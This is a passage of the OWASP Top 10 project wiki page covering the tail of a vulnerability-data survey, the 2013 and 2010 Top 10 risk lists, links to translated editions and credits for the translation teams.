* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Efforts are already underway to translate the OWASP Top 10 for 2017. NOTE: This is still a '''release candidate''' so will definitely change before it's final. To avoid rework, you might want to wait until the final is released.If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please let me know you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint]. Please use this document as the basis for your translation efforts. &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
